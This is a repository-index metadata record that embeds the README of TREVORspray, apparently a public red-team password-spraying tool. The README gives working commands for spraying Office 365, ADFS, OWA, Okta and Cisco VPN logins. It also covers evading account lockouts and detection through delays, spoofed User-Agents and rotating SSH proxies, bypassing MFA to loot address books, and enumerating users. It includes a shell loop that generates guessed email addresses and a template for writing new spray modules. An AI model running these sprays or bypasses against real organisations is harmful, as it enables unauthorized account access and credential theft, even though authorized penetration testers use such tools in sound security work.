{"id":15116282,"url":"https://github.com/blacklanternsecurity/TREVORspray","last_synced_at":"2025-09-27T22:30:22.157Z","repository":{"id":37777256,"uuid":"293375616","full_name":"blacklanternsecurity/TREVORspray","owner":"blacklanternsecurity","description":"TREVORspray is a modular password sprayer with threading, clever proxying, loot modules, and more!","archived":false,"fork":false,"pushed_at":"2024-11-13T00:48:32.000Z","size":207,"stargazers_count":1095,"open_issues_count":3,"forks_count":150,"subscribers_count":18,"default_branch":"trevorspray-v2","last_synced_at":"2025-01-15T20:12:16.567Z","etag":null,"topics":["365","autodiscover","email","exchange","hacking","microsoft","oauth","office","password","passwords","proxy","python","security","socks","spray","spraying","trevor"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/blacklanternsecurity.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-09-06T23:02:37.000Z","updated_at":"2025-01-14T13:54:36.000Z","dependencies_parsed_at":"2023-11-14T17:32:08.476Z","dependency_job_id":"122647bd-6f82-44a4-8933-ab10a9d133e1","html_url":"https://github.com/blacklanternsecurity/TREVORspray","commit_stats":{"total_commits":103,"total_committers":5,"mean_commits":20.6,"dds":"0.16504854368932043","last_synced_commit":"70aca7b768937fd450b99ce753a9cad276b65551"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blacklanternsecur
ity%2FTREVORspray","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blacklanternsecurity%2FTREVORspray/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blacklanternsecurity%2FTREVORspray/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blacklanternsecurity%2FTREVORspray/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/blacklanternsecurity","download_url":"https://codeload.github.com/blacklanternsecurity/TREVORspray/tar.gz/refs/heads/trevorspray-v2","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":234461934,"owners_count":18837202,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["365","autodiscover","email","exchange","hacking","microsoft","oauth","office","password","passwords","proxy","python","security","socks","spray","spraying","trevor"],"created_at":"2024-09-26T01:44:17.137Z","updated_at":"2025-09-27T22:30:22.150Z","avatar_url":"https://github.com/blacklanternsecurity.png","language":"Python","readme":"# TREVORspray 2.0\nTREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!\n\nBy [@thetechr0mancer](https://twitter.com/thetechr0mancer)\n\n[![License](https://img.shields.io/badge/license-GPLv3-blue.svg)](https://raw.githubusercontent.com/blacklanternsecurity/nmappalyzer/master/LICENSE)\n[![Python Version](https://img.shields.io/badge/python-3.6+-blue)](https://www.python.org)\n\n## Installation:\n~~~bash\npip install 
git+https://github.com/blacklanternsecurity/trevorproxy\npip install git+https://github.com/blacklanternsecurity/trevorspray\n~~~\n\nSee the accompanying [**Blog Post**](blogpost.md) for a fun rant and some cool demos!\n\n![trevorspray-demo](https://user-images.githubusercontent.com/20261699/149219712-8549e15c-2eee-4d7a-a615-e8882b693c3f.gif)\n\n## Features\n- Threads, lots of threads\n- Multiple modules\n  - `msol` (Office 365)\n  - `adfs` (Active Directory Federation Services)\n  - `owa` (Outlook Web App)\n  - `okta` (Okta SSO)\n  - `anyconnect` (Cisco VPN)\n  - custom modules (easy to make!)\n- Tells you the status of each account: if it exists, is locked, has MFA enabled, etc.\n- Automatic cancel/resume (remembers already-tried user/pass combos in `~/.trevorspray/tried_logins.txt`)\n- Round-robin proxy through multiple IPs with `--ssh` or `--subnet`\n- Automatic infinite reconnect/retry if a proxy goes down (or if you lose internet)\n- Spoofs `User-Agent` and other signatures to look like legitimate auth traffic\n- Comprehensive logging\n- Optional `--delay`, `--jitter`, and `--lockout-delay` between requests to bypass lockout countermeasures\n- IPv6 support\n- O365 MFA bypass support (disable with `--no-loot`)\n  - IMAP\n  - SMTP\n  - POP\n  - EWS (Exchange Web Services) - Automatically retrieves GAL (Global Address Book)\n  - EAS (Exchange ActiveSync)\n    - Recommended bypass: BlueMail Android app\n  - EXO (Exchange Online PowerShell)\n  - UM (Exchange Unified Messaging)\n  - AutoDiscover - Automatically retrieves OAB (Offline Address Book)\n  - Azure Portal Access\n- Domain `--recon` with the following features:\n  - list MX/TXT records\n  - list O365 info\n    - tenant ID\n    - tenant name\n    - other tenant domains\n    - SharePoint URL\n    - authentication URLs, autodiscover, federation config, etc.\n  - User enumeration (use `--recon` and `--users`):\n    - `OneDrive`\n    - `Azure Seamless SSO`\n\n## How To - O365\n- First, get a list of emails for 
`corp.com` and perform a spray to see if the default configuration works. Usually it does.\n- If TREVORspray says the emails in your list don't exist, don't give up. Get the `token_endpoint` with `--recon corp.com`. The `token_endpoint` is the URL you'll be spraying against (with the `--url` option).\n- It may take some experimentation before you find the right combination of `token_endpoint` + email format.\n    - For example, if you're attacking `corp.com`, it may not be as easy as spraying `corp.com`. You may find that Corp's parent company Evilcorp owns their Azure tenant, meaning that you need to spray against `evilcorp.com`'s `token_endpoint`. Also, you may find that `corp.com`'s internal domain `corp.local` is used instead of `corp.com`.\n    - So in the end, instead of spraying `bob@corp.com` against `corp.com`'s `token_endpoint`, you're spraying `bob@corp.local` against `evilcorp.com`'s.\n\n## Example: Perform recon against a domain (retrieves tenant info, autodiscover, mx records, etc.)\n```bash\ntrevorspray --recon evilcorp.com\n...\n    \"token_endpoint\": \"https://login.windows.net/b439d764-cafe-babe-ac05-2e37deadbeef/oauth2/token\"\n...\n```\n\n## Example: Enumerate users via OneDrive (no failed logins)\n```bash\ntrevorspray --recon evilcorp.com -u emails.txt --threads 10\n```\n\n![recon-user-enumeration](https://user-images.githubusercontent.com/20261699/151052308-d938bf6c-f335-4d3e-9c3c-1fd79a188e73.gif)\n\n## Example: Spray against discovered \"token_endpoint\" URL\n```bash\ntrevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b439d764-cafe-babe-ac05-2e37deadbeef/oauth2/token\n```\n\n## Example: Spray with 5-second delay between requests\n```bash\ntrevorspray -u bob@evilcorp.com -p 'Welcome123' --delay 5\n```\n\n## Example: Spray and round-robin between 3 IPs (the current IP is also used, unless `-n` is specified)\n```bash\ntrevorspray -u emails.txt -p 'Welcome123' --ssh root@1.2.3.4 root@4.3.2.1\n```\n\n## Example: Find valid 
usernames without OSINT \u003e:D\n```bash\n# clone wordsmith dataset\nwget https://github.com/skahwah/wordsmith/releases/download/v2.1.1/data.tar.xz \u0026\u0026 tar -xvf data.tar.xz \u0026\u0026 cd data\n\n# order first initial by occurrence\nordered_letters=asjmkdtclrebnghzpyivfowqux\n\n# loop through first initials\necho -n $ordered_letters | while read -n1 f; do\n  # loop through top 2000 USA last names\n  head -n 2000 'usa/lnames.txt' | while read last; do\n    # generate emails in f.last format\n    echo \"${f}.${last}@evilcorp.com\"\n  done\ndone | tee f.last.txt\n\ntrevorspray -u f.last.txt -p 'Welcome123'\n```\n\n## Extract data from downloaded LZX files\nWhen TREVORspray successfully bypasses MFA and retrieves an Offline Address Book (OAB), the address book is downloaded in LZX format to `~/.trevorspray/loot`. LZX is an ancient and obnoxious compression algorithm used by Microsoft.\n~~~bash\n# get libmspack (for extracting LZX file)\ngit clone https://github.com/kyz/libmspack\ncd libmspack/libmspack/\n./rebuild.sh\n./configure\nmake\n\n# extract LZX file\n./examples/.libs/oabextract ~/.trevorspray/loot/deadbeef-ce01-4ec9-9d08-1050bdc41131-data-1.lzx oab.bin\n# extract all strings\nstrings oab.bin\n# extract and dedupe emails\negrep -oa '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,6}' oab.bin | tr '[:upper:]' '[:lower:]' | sort -u\n~~~\n\n## TREVORspray - Help:\n```\n$ trevorspray --help\nusage: trevorspray [-h] [-m {owa,okta,auth0,anyconnect,jumpcloud,adfs,msol,example}] [-up USERPASS [USERPASS ...]] [-u USERS [USERS ...]] [-p PASSWORDS [PASSWORDS ...]] [--url URL]\n                   [-r DOMAIN] [--export-tenants FILE] [-t THREADS] [-f] [-d DELAY] [-ld LOCKOUT_DELAY] [-j JITTER] [-e] [-nl] [--ignore-lockouts] [--timeout TIMEOUT] [--random-useragent]\n                   [-6] [--proxy PROXY] [-v] [-s USER@SERVER [USER@SERVER ...]] [-i KEY] [-b BASE_PORT] [-n] [--subnet SUBNET] [--interface INTERFACE]\n\nA password sprayer with the option to load-balance 
traffic through SSH hosts\n\noptions:\n  -h, --help            show this help message and exit\n\nbasic arguments:\n  -m, --module {owa,okta,auth0,anyconnect,jumpcloud,adfs,msol,example}\n                        Spray module to use (default: msol)\n  -up, --userpass USERPASS [USERPASS ...]\n                        file(s) containing username and password pairs (format: 'username:password')\n  -u, --users USERS [USERS ...]\n                        Usernames(s) and/or file(s) containing usernames\n  -p, --passwords PASSWORDS [PASSWORDS ...]\n                        Password(s) and/or file(s) containing passwords\n  --url URL             The URL to spray against\n  -r, --recon, --enumerate DOMAIN\n                        Retrieves MX records and info related to authentication, email, Azure, Microsoft 365, etc. If --usernames are specified, this also enables username enumeration.\n  --export-tenants FILE\n                        Export all discovered tenant domains to a file\n\nadvanced arguments:\n  Round-robin traffic through remote systems via SSH (overrides --threads)\n\n  -t, --threads THREADS\n                        Max number of concurrent requests (default: 1)\n  -f, --force           Try all usernames/passwords even if they've been tried before\n  -d, --delay DELAY     Sleep for this many seconds between requests\n  -ld, --lockout-delay LOCKOUT_DELAY\n                        Sleep for this many additional seconds when a lockout is encountered\n  -j, --jitter JITTER   Add a random delay of up to this many seconds between requests\n  -e, --exit-on-success\n                        Stop spray when a valid cred is found\n  -nl, --no-loot        Don't execute loot activites for valid accounts\n  --ignore-lockouts     Forces the spray to continue and not stop when multiple account lockouts are detected\n  --timeout TIMEOUT     Connection timeout in seconds (default: 10)\n  --random-useragent    Add a random value to the User-Agent for each request\n  -6, 
--prefer-ipv6     Prefer IPv6 over IPv4\n  --proxy PROXY         Proxy to use for HTTP and HTTPS requests\n  -v, --verbose, --debug\n                        Show which proxy is being used for each request\n\nSSH Proxy:\n  Round-robin traffic through remote systems via SSH (overrides --threads)\n\n  -s, --ssh USER@SERVER [USER@SERVER ...]\n                        Round-robin load-balance through these SSH hosts (user@host) NOTE: Current IP address is also used once per round\n  -i, -k, --key KEY     Use this SSH key when connecting to proxy hosts\n  -b, --base-port BASE_PORT\n                        Base listening port to use for SOCKS proxies\n  -n, --no-current-ip   Don't spray from the current IP, only use SSH proxies\n\nSubnet Proxy:\n  Send traffic from random addresses within IP subnet\n\n  --subnet SUBNET       Subnet to send packets from\n  --interface INTERFACE\n                        Interface to send packets on\n```\n\n## Writing your own Spray Modules\nIf you need to spray a service/endpoint that's not supported yet, you can write your own spray module! This is a great option because custom modules benefit from all of TREVORspray's features -- e.g. proxies, delay, jitter, etc.\n\nWriting your own spray module is pretty straightforward. Create a new `.py` file in `lib/sprayers` (e.g. `lib/sprayers/custom_sprayer.py`), and create a class that inherits from `BaseSprayModule`. You can call the class whatever you want. Fill out the HTTP method and any other parameters that you need in the requests (you can reference `lib/sprayers/base.py` or any of the other modules for examples).\n  - You only need to implement one method on your custom class: `check_response()`. This method evaluates the HTTP response to determine whether the login was successful.\n  - Once you're finished, you can use the custom spray module by specifying the name of your python file (without the `.py`) on the command line, e.g. 
`trevorspray -m custom_sprayer -u users.txt -p Welcome123`.\n~~~python\n# Example spray module\n\nfrom .base import BaseSprayModule\n\nclass SprayModule(BaseSprayModule):\n\n    # HTTP method\n    method = 'POST'\n    # default target URL\n    default_url = 'https://login.evilcorp.com/'\n    # body of request\n    request_data = 'user={username}\u0026pass={password}\u0026group={otherthing}'\n    # HTTP headers\n    headers = {}\n    # HTTP cookies\n    cookies = {}\n    # Don't count nonexistent accounts as failed logons\n    fail_nonexistent = False\n\n    headers = {\n        'User-Agent': 'Your Moms Smart Vibrator',\n    }\n\n    def initialize(self):\n        '''\n        Get additional arguments from user at runtime\n        NOTE: These can also be passed via environment variables beginning with \"TREVOR_\":\n            TREVOR_otherthing=asdf\n        '''\n        while not self.trevor.runtimeparams.get('otherthing', ''):\n            self.trevor.runtimeparams.update({\n                'otherthing': input(\"What's that other thing? 
\")\n            })\n\n        return True\n\n\n    def check_response(self, response):\n        '''\n        returns (valid, exists, locked, msg)\n        '''\n\n        valid = False\n        exists = None\n        locked = None\n        msg = ''\n\n        if getattr(response, 'status_code', 0) == 200:\n            valid = True\n            exists = True\n            msg = 'Valid cred'\n\n        return (valid, exists, locked, msg)\n~~~\n\nCREDIT WHERE CREDIT IS DUE - MANY THANKS TO:\n- [@dafthack](https://twitter.com/dafthack) for writing [MSOLSpray](https://github.com/dafthack/MSOLSpray)\n- [@Mrtn9](https://twitter.com/Mrtn9) for his Python port of [MSOLSpray](https://github.com/MartinIngesen/MSOLSpray)\n- [@KnappySqwurl](https://twitter.com/KnappySqwurl) for being a splunk wizard\n- [@CarsonSallis](https://github.com/CarsonSallis) for the O365 MFA bypasses\n- [@DrAzureAD](https://twitter.com/DrAzureAD) for the Azure AD recon features ([AADInternals](https://github.com/Gerenios/AADInternals))\n- [@nyxgeek](https://twitter.com/nyxgeek) for the OneDrive user enumeration ([onedrive_user_enum](https://github.com/nyxgeek/onedrive_user_enum))\n- [@gremwell](https://twitter.com/gremwell) for the Seamless SSO user enumeration ([o365enum](https://github.com/gremwell/o365enum))\n\n![trevor](https://user-images.githubusercontent.com/20261699/92336575-27071380-f070-11ea-8dd4-5ba42c7d04b7.jpeg)\n\n`#trevorforget`\n","funding_links":[],"categories":["Python","Red Team","Password Generation"],"sub_categories":["Initial Access","Spraying Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblacklanternsecurity%2FTREVORspray","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fblacklanternsecurity%2FTREVORspray","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblacklanternsecurity%2FTREVORspray/lists"}